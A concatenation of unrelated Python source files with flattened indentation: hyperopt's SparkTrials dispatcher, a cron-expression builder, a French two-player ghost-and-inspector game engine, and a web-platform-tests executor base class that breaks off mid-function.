"Timeout param was defined in Trials object, ignoring fmin definition"
)
else:
validate_timeout(timeout)
self.timeout = timeout
if loss_threshold is not None:
validate_loss_threshold(loss_threshold)
self.loss_threshold = loss_threshold
assert (
not pass_expr_memo_ctrl
), "SparkTrials does not support `pass_expr_memo_ctrl`"
assert (
not catch_eval_exceptions
), "SparkTrials does not support `catch_eval_exceptions`"
state = _SparkFMinState(self._spark, fn, space, self)
# Will launch a dispatcher thread which runs each trial task as one spark job.
state.launch_dispatcher()
try:
res = fmin(
fn,
space,
algo,
max_evals,
timeout=timeout,
loss_threshold=loss_threshold,
max_queue_len=max_queue_len,
trials=self,
allow_trials_fmin=False, # -- prevent recursion
rstate=rstate,
pass_expr_memo_ctrl=None, # not supported
catch_eval_exceptions=catch_eval_exceptions,
verbose=verbose,
return_argmin=return_argmin,
points_to_evaluate=None, # not supported
show_progressbar=show_progressbar,
early_stop_fn=early_stop_fn,
trials_save_file="", # not supported
)
except BaseException as e:
logger.debug("fmin thread exits with an exception raised.")
raise e
else:
logger.debug("fmin thread exits normally.")
return res
finally:
state.wait_for_all_threads()
logger.info(
"Total Trials: {t}: {s} succeeded, {f} failed, {c} cancelled.".format(
t=self.count_total_trials(),
s=self.count_successful_trials(),
f=self.count_failed_trials(),
c=self.count_cancelled_trials(),
)
)
class _SparkFMinState:
"""
Class for managing threads which run concurrent Spark jobs.
This maintains a primary dispatcher thread, plus 1 thread per Hyperopt trial.
Each trial's thread runs 1 Spark job with 1 task.
"""
def __init__(self, spark, eval_function, space, trials):
self.spark = spark
self.eval_function = eval_function
self.space = space
self.trials = trials
self._fmin_done = False
self._dispatcher_thread = None
self._task_threads = set()
if self.trials._spark_supports_job_cancelling:
spark_context = spark.sparkContext
self._job_group_id = spark_context.getLocalProperty("spark.jobGroup.id")
self._job_desc = spark_context.getLocalProperty("spark.job.description")
interrupt_on_cancel = spark_context.getLocalProperty(
"spark.job.interruptOnCancel"
)
if interrupt_on_cancel is None:
self._job_interrupt_on_cancel = False
else:
self._job_interrupt_on_cancel = "true" == interrupt_on_cancel.lower()
# In certain Spark deployments, the local property "spark.jobGroup.id"
# value is None, so we create one to use for SparkTrials.
if self._job_group_id is None:
self._job_group_id = "Hyperopt_SparkTrials_" + _get_random_id()
if self._job_desc is None:
self._job_desc = "Trial evaluation jobs launched by hyperopt fmin"
logger.debug(
"Job group id: {g}, job desc: {d}, job interrupt on cancel: {i}".format(
g=self._job_group_id,
d=self._job_desc,
i=self._job_interrupt_on_cancel,
)
)
def running_trial_count(self):
return self.trials.count_by_state_unsynced(base.JOB_STATE_RUNNING)
@staticmethod
def _begin_trial_run(trial):
trial["state"] = base.JOB_STATE_RUNNING
now = coarse_utcnow()
trial["book_time"] = now
trial["refresh_time"] = now
logger.debug("trial task {tid} started".format(tid=trial["tid"]))
@staticmethod
def _get_traceback(err):
return err.__dict__.get("_tb_str")
def _finish_trial_run(self, is_success, is_cancelled, trial, data):
"""
Call this method when a trial evaluation finishes. It will save results to the
trial object and update task counters.
:param is_success: whether the trial succeeded
:param is_cancelled: whether the trial was cancelled
:param data: If the trial succeeded, this is the return value from the trial
task function. Otherwise, this is the exception raised when running the trial
task.
"""
if is_cancelled:
logger.debug(
"trial task {tid} cancelled, exception is {e}".format(
tid=trial["tid"], e=str(data)
)
)
self._write_cancellation_back(trial, e=data)
elif is_success:
logger.debug(
"trial task {tid} succeeded, result is {r}".format(
tid=trial["tid"], r=data
)
)
self._write_result_back(trial, result=data)
else:
logger.error(
"trial task {tid} failed, exception is {e}.\n {tb}".format(
tid=trial["tid"], e=str(data), tb=self._get_traceback(data)
)
)
self._write_exception_back(trial, e=data)
def launch_dispatcher(self):
def run_dispatcher():
start_time = timeit.default_timer()
while not self._fmin_done:
new_tasks = self._poll_new_tasks()
for trial in new_tasks:
self._run_trial_async(trial)
cur_time = timeit.default_timer()
elapsed_time = cur_time - start_time
# In the future, timeout checking logic could be moved to `fmin`.
# For now, timeouts are specific to SparkTrials.
# When a timeout happens:
# - Set `trials._fmin_cancelled` flag to be True.
# - FMinIter checks this flag and exits if it is set to True.
if (
self.trials.timeout is not None
and elapsed_time > self.trials.timeout
and not self.trials._fmin_cancelled
):
self.trials._fmin_cancelled = True
self.trials._fmin_cancelled_reason = "fmin run timeout"
self._cancel_running_trials()
logger.warning(
"fmin cancelled because of "
+ self.trials._fmin_cancelled_reason
)
time.sleep(1)
if self.trials._fmin_cancelled:
# Because cancelling fmin triggered, warn that the dispatcher won't launch
# more trial tasks.
logger.warning("fmin is cancelled, so new trials will not be launched.")
logger.debug("dispatcher thread exits normally.")
self._dispatcher_thread = threading.Thread(target=run_dispatcher)
self._dispatcher_thread.setDaemon(True)
self._dispatcher_thread.start()
@staticmethod
def _get_spec_from_trial(trial):
return base.spec_from_misc(trial["misc"])
@staticmethod
def _write_result_back(trial, result):
trial["state"] = base.JOB_STATE_DONE
trial["result"] = result
trial["refresh_time"] = coarse_utcnow()
def _write_exception_back(self, trial, e):
trial["state"] = base.JOB_STATE_ERROR
trial["misc"]["error"] = (str(type(e)), self._get_traceback(e))
trial["refresh_time"] = coarse_utcnow()
@staticmethod
def _write_cancellation_back(trial, e):
trial["state"] = base.JOB_STATE_CANCEL
trial["misc"]["error"] = (str(type(e)), str(e))
trial["refresh_time"] = coarse_utcnow()
def _run_trial_async(self, trial):
def finish_trial_run(result_or_e):
if not isinstance(result_or_e, BaseException):
self._finish_trial_run(
is_success=True,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread exits normally and writes results "
"back correctly.".format(tid=trial["tid"])
)
else:
self._finish_trial_run(
is_success=False,
is_cancelled=self.trials._fmin_cancelled,
trial=trial,
data=result_or_e,
)
logger.debug(
"trial {tid} task thread catches an exception and writes the "
"info back correctly.".format(tid=trial["tid"])
)
def run_task_thread():
local_eval_function, local_space = self.eval_function, self.space
params = self._get_spec_from_trial(trial)
def run_task_on_executor(_):
domain = base.Domain(
local_eval_function, local_space, pass_expr_memo_ctrl=None
)
try:
result = domain.evaluate(
params, ctrl=None, attach_attachments=False
)
yield result
except BaseException as e:
# Because the traceback is not pickable, we need format it and pass it back
# to driver
_traceback_string = traceback.format_exc()
logger.error(_traceback_string)
e._tb_str = _traceback_string
yield e
try:
worker_rdd = self.spark.sparkContext.parallelize([0], 1)
if self.trials._spark_supports_job_cancelling:
if _spark_major_minor_version >= (3, 2):
spark_context = self.spark.sparkContext
spark_context.setLocalProperty(
"spark.jobGroup.id", self._job_group_id
)
spark_context.setLocalProperty(
"spark.job.description", self._job_desc
)
spark_context.setLocalProperty(
"spark.job.interruptOnCancel",
str(self._job_interrupt_on_cancel).lower(),
)
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collectWithJobGroup(
self._job_group_id,
self._job_desc,
self._job_interrupt_on_cancel,
)[
0
]
else:
result_or_e = worker_rdd.mapPartitions(
run_task_on_executor
).collect()[0]
except BaseException as e:
# I recommend to catch all exceptions here, it can make the program more robust.
# There're several possible reasons lead to raising exception here.
# so I use `except BaseException` here.
#
# If cancelled flag is set, it represent we need to cancel all running tasks,
# Otherwise it represent the task failed.
finish_trial_run(e)
else:
# The exceptions captured in run_task_on_executor would be returned in the result_or_e
finish_trial_run(result_or_e)
if _spark_major_minor_version >= (3, 2):
from pyspark import inheritable_thread_target
run_task_thread = inheritable_thread_target(run_task_thread)
task_thread = threading.Thread(target=run_task_thread)
task_thread.setDaemon(True)
task_thread.start()
self._task_threads.add(task_thread)
def _poll_new_tasks(self):
new_task_list = []
for trial in copy.copy(self.trials.trials):
if trial["state"] == base.JOB_STATE_NEW:
# check parallelism limit
if self.running_trial_count() >= self.trials.parallelism:
break
new_task_list.append(trial)
self._begin_trial_run(trial)
return new_task_list
def _cancel_running_trials(self):
if self.trials._spark_supports_job_cancelling:
logger.debug(
"Cancelling all running jobs in job group {g}".format(
g=self._job_group_id
)
)
self.spark.sparkContext.cancelJobGroup(self._job_group_id)
# Make a copy of trials by slicing
for trial in self.trials.trials[:]:
if trial["state"] in [base.JOB_STATE_NEW, base.JOB_STATE_RUNNING]:
trial["state"] = base.JOB_STATE_CANCEL
else:
logger.info(
"Because the current Apache PySpark version does not support "
"cancelling jobs by job group ID, SparkTrials will block until all of "
"its running Spark jobs finish."
)
def wait_for_all_threads(self):
"""
Wait for the dispatcher and worker threads to finish.
:param cancel_running_trials: If true, try to cancel all running trials.
"""
self._fmin_done = True
self._dispatcher_thread.join()
self._dispatcher_thread = None
for task_thread in self._task_threads:
task_thread.join()
self._task_threads.clear()
|
_cronjobs.py
|
from typing import Callable, List, Union
from datetime import datetime, time
from time import sleep
from functools import partial
from re import compile, match, Match, Pattern
from threading import Thread
from croniter import CroniterBadCronError, croniter
class CronBit:
_parent: 'CronBuilder'
_val: Union[List[int], int]
_verb: str
def __init__(self, parent: 'CronBuilder', val: Union[List[int], int], verb: str) -> None:
self._parent = parent
self._val = val
self._verb = verb
@property
def minutes(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.minutes = val
return self._parent
@property
def hours(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.hours = val
return self._parent
@property
def days(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.days = val
return self._parent
@property
def months(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.months = val
return self._parent
@property
def weekdays(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.weekdays = val
return self._parent
class CronBuilder:
_min: str
_hour: str
_day: str
_month: str
_week: str
def __init__(self) -> None:
self._min = '*'
self._hour = '*'
self._day = '*'
self._month = '*'
self._week = '*'
def every(self, val: Union[List[int], int]) -> CronBit:
return CronBit(self, val, 'every')
def at(self, val: Union[List[int], int]) -> CronBit:
return CronBit(self, val, 'at')
@property
def minutes(self) -> str:
return self._min
@minutes.setter
def minutes(self, val: str) -> None:
self._min = val
@minutes.deleter
def minutes(self) -> None:
self._min = '*'
@property
def hours(self) -> str:
return self._hour
@hours.setter
def hours(self, val: str) -> None:
self._hour = val
@hours.deleter
def hours(self) -> None:
self._hour = '*'
@property
def days(self) -> str:
return self._day
@days.setter
def days(self, val: str) -> None:
self._day = val
@days.deleter
def days(self) -> None:
self._day = '*'
@property
def months(self) -> str:
return self._month
@months.setter
def months(self, val: str) -> None:
self._month = val
@months.deleter
def months(self) -> None:
self._month = '*'
@property
def weekdays(self) -> str:
return self._week
@weekdays.setter
def weekdays(self, val: str) -> None:
self._week = val
@weekdays.deleter
def weekdays(self) -> None:
self._week = '*'
@property
def is_valid(self) -> bool:
try:
_: croniter = self.croniter
return True
except CroniterBadCronError:
return False
def __str__(self) -> str:
return f'{self._min} {self._hour} {self._day} {self._month} {self._week}'
def __add__(self, other: 'CronBuilder') -> 'CronBuilder':
out: 'CronBuilder' = CronBuilder()
out.minutes = self.minutes
out.hours = self.hours
out.days = self.days
out.months = self.months
out.weekdays = self.weekdays
if self.minutes == '*' and other.minutes != '*':
out.minutes = other.minutes
if self.hours == '*' and other.hours != '*':
out.hours = other.hours
if self.days == '*' and other.days != '*':
out.days = other.days
if self.months == '*' and other.months != '*':
out.months = other.months
if self.weekdays == '*' and other.weekdays != '*':
out.weekdays = other.weekdays
return out
def __iadd__(self, other: 'CronBuilder') -> 'CronBuilder':
out: 'CronBuilder' = self + other
self.minutes = out.minutes
self.hours = out.hours
self.days = out.days
self.months = out.months
self.weekdays = out.weekdays
return self
@property
def croniter(self) -> croniter:
return croniter(str(self), datetime.now(), datetime)
@property
def cron(self) -> 'Cron':
return Cron(str(self))
class Cron:
_expr: str
_cron: croniter
def __init__(self, expr: str) -> None:
self._expr = expr
self._cron = croniter(str(self._expr), datetime.now(), datetime)
def wrap(self, func: Callable):
def _inner(cron: croniter, func: Callable):
_next: datetime = cron.get_next(datetime)
while True:
if _next > datetime.now():
sleep(.5)
continue
func()
_next = cron.get_next()
t: Thread = Thread(target=_inner, args=(self._cron, func))
t.daemon = True
t.start()
@staticmethod
def builder() -> CronBuilder:
return CronBuilder()
def wait(func: Union[Callable, None] = None, *, until: str):
if func is None:
p: partial = partial(wait, until=until)
return p
until = until.strip()
_patt: Pattern = compile(r'(\d+):(\d+)')
_match: Union[Match, None] = match(_patt, until)
if _match is None:
raise ValueError
int(_match.group(1))
_h: int = int(_match.group(1))
_m: int = int(_match.group(2))
_until: time = time(_h, _m)
def _inner(until_time: time, func: Callable):
while True:
if until_time > datetime.now().time():
sleep(.5)
continue
func()
break
t: Thread = Thread(target=_inner, args=(_until, func))
t.daemon = True
t.start()
|
exo1.py
|
from random import shuffle,randrange
from time import sleep
from threading import Thread
import dummy0, dummy1
latence = 0.001
permanents, deux, avant, apres = {'rose'}, {'rouge','gris','bleu'}, {'violet','marron'}, {'noir','blanc'}
couleurs = avant | permanents | apres | deux
passages = [{1,4},{0,2},{1,3},{2,7},{0,5,8},{4,6},{5,7},{3,6,9},{4,9},{7,8}]
pass_ext = [{1,4},{0,2,5,7},{1,3,6},{2,7},{0,5,8,9},{4,6,1,8},{5,7,2,9},{3,6,9,1},{4,9,5},{7,8,4,6}]
def message(texte,jos):
for j in jos:
f = open("./"+str(j.numero)+"/infos.txt","a")
f.write(texte + "\n")
f.close()
def informer(texte):
message(texte,joueurs)
def demander(q,j):
informer("QUESTION : "+q)
f = open("./"+str(j.numero)+"/questions"+".txt","w")
f.write(q)
f.close()
sleep(latence)
f = open("./"+str(j.numero)+"/reponses"+".txt","r")
r = f.read()
f.close()
informer("REPONSE DONNEE : "+r)
return r
class personnage:
def __init__(self,couleur):
self.couleur, self.suspect, self.position, self.pouvoir = couleur, True, 0, True
def __repr__(self):
susp = "-suspect" if self.suspect else "-clean"
return self.couleur + "-" + str(self.position) + susp
class joueur:
def __init__(self,n):
self.numero = n
self.role = "l'inspecteur" if n == 0 else "le fantome"
def jouer(self,party):
informer("****\n Tour de "+self.role)
p = self.selectionner(party.tuiles_actives)
avec = self.activer_pouvoir(p,party,avant|deux)
self.bouger(p,avec,party.bloque)
self.activer_pouvoir(p,party,apres|deux)
def selectionner(self,t):
w = demander("Tuiles disponibles : " + str(t) + " choisir entre 0 et " + str(len(t)-1),self)
i = int(w) if w.isnumeric() and int(w) in range(len(t)) else 0
p = t[i]
informer("REPONSE INTERPRETEE : "+str(p))
informer(self.role + " joue " + p.couleur)
del t[i]
return p
def activer_pouvoir(self,p,party,activables):
if p.pouvoir and p.couleur in activables:
a = demander("Voulez-vous activer le pouvoir (0/1) ?",self) == "1"
informer("REPONSE INTERPRETEE : "+str(a==1))
if a :
informer("Pouvoir de " + p.couleur + " activé")
p.pouvoir = False
if p.couleur == "rouge":
draw = party.cartes[0]
informer(str(draw) + " a été tiré")
if draw == "fantome":
party.start += -1 if self.numero == 0 else 1
elif self.numero == 0:
draw.suspect = False
del party.cartes[0]
if p.couleur == "noir":
for q in party.personnages:
if q.position in {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque} :
q.position = p.position
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "blanc":
for q in party.personnages:
if q.position == p.position and p != q:
dispo = {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque}
w = demander(str(q) + ", positions disponibles : " + str(dispo) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in dispo else dispo.pop()
informer("REPONSE INTERPRETEE : "+str(x))
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "violet":
informer("Rappel des positions :\n" + str(party))
co = demander("Avec quelle couleur échanger (pas violet!) ?",self)
if co not in couleurs:
co = "rose"
informer("REPONSE INTERPRETEE : "+co)
q = [x for x in party.personnages if x.couleur == co][0]
p.position, q.position = q.position, p.position
informer("NOUVEAU PLACEMENT : "+str(p))
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "marron":
return [q for q in party.personnages if p.position == q.position]
if p.couleur == "gris":
w = demander("Quelle salle obscurcir ? (0-9)",self)
party.shadow = int(w) if w.isnumeric() and int(w) in range(10) else (party.shadow+1)%10
informer("REPONSE INTERPRETEE : "+str(party.shadow))
if p.couleur == "bleu":
w = demander("Quelle salle bloquer ? (0-9)",self)
x = int(w) if w.isnumeric() and int(w) in range(10) else 0
w = demander("Quelle sortie ? Chosir parmi : "+str(passages[x]),self)
y = int(w) if w.isnumeric() and int(w) in passages[x] else passages[x].copy().pop()
informer("REPONSE INTERPRETEE : "+str({x,y}))
party.bloque = {x,y}
return [p]
def bouger(self,p,avec,bloque):
pass_act = pass_ext if p.couleur == 'rose' else passages
if p.couleur != 'violet' or p.pouvoir:
disp = {x for x in pass_act[p.position] if p.position not in bloque or x not in bloque}
w = demander("positions disponibles : " + str(disp) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in disp else disp.pop()
informer("REPONSE INTERPRETEE : "+str(x))
for q in avec:
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
class partie:
def __init__(self,joueurs):
for i in [0,1]:
f = open("./"+str(i)+"/infos"+".txt","w")
f.write("")
f.close()
self.joueurs = joueurs
self.start, self.end, self.num_tour, self.shadow, x = 4, 22, 1, randrange(10), randrange(10)
self.bloque = {x,passages[x].copy().pop()}
self.personnages = {personnage(c) for c in couleurs}
self.tuiles = [p for p in self.personnages]
self.cartes = self.tuiles[:]
self.fantome = self.cartes[randrange(8)]
message("!!! Le fantôme est : "+self.fantome.couleur,[self.joueurs[0]])
self.cartes.remove(self.fantome)
self.cartes += ['fantome']*3
shuffle(self.tuiles)
shuffle(self.cartes)
for i,p in enumerate(self.tuiles):
p.position = i
def actions(self):
joueur_actif = self.num_tour % 2
if joueur_actif == 1:
shuffle(self.tuiles)
self.tuiles_actives = self.tuiles[:4]
else:
self.tuiles_actives = self.tuiles[4:]
for i in [joueur_actif,1-joueur_actif,1-joueur_actif,joueur_actif]:
self.joueurs[i].jouer(self)
def lumiere(self):
partition = [{p for p in self.personnages if p.position == i} for i in range(10)]
if len(partition[self.fantome.position]) == 1 or self.fantome.position == self.shadow:
informer("le fantome frappe")
self.start += 1
for piece,gens in enumerate(partition):
if len(gens) > 1 and piece != self.shadow:
for p in gens:
p.suspect = False
else:
informer("pas de cri")
for piece,gens in enumerate(partition):
if len(gens) == 1 or piece == self.shadow:
for p in gens:
p.suspect = False
self.start += len([p for p in self.personnages if p.suspect])
def tour(self):
informer("**************************\n" + str(self))
self.actions()
self.lumiere()
for p in self.personnages:
p.pouvoir = True
self.num_tour += 1
def lancer(self):
while self.start < self.end and len([p for p in self.personnages if p.suspect]) > 1:
self.tour()
informer("L'enquêteur a trouvé - c'était " + str(self.fantome) if self.start < self.end else "Le fantôme a gagné")
informer("Score final : "+str(self.end-self.start))
return self.end-self.start
def __repr__(self):
return "Tour:" + str(self.num_tour) + ", Score:"+str(self.start)+"/"+str(self.end) + ", Ombre:" + str(self.shadow) + ", Bloque:" + str(self.bloque) +"\n" + " ".join([str(p) for p in self.personnages])
score = []
joueurs = [joueur(0),joueur(1)]
nbparties = 20
for i in range(nbparties):
t1,t2 = Thread(target=dummy0.lancer), Thread(target=dummy1.lancer)
t1.start()
t2.start()
score.append(partie(joueurs).lancer())
t1.join()
t2.join()
victoires = [x for x in score if x<=0]
print("Efficacité : "+str(len(victoires)/nbparties*100)+"%")
|
base.py
|
import base64
import hashlib
from six.moves.http_client import HTTPConnection
import io
import json
import os
import threading
import traceback
import socket
import sys
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the timeout multiplier since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
finished = self.result_flag.wait(self.timeout + 2 * self.extra_timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive:
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, urls, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
def get_differences(self, screenshots, urls):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
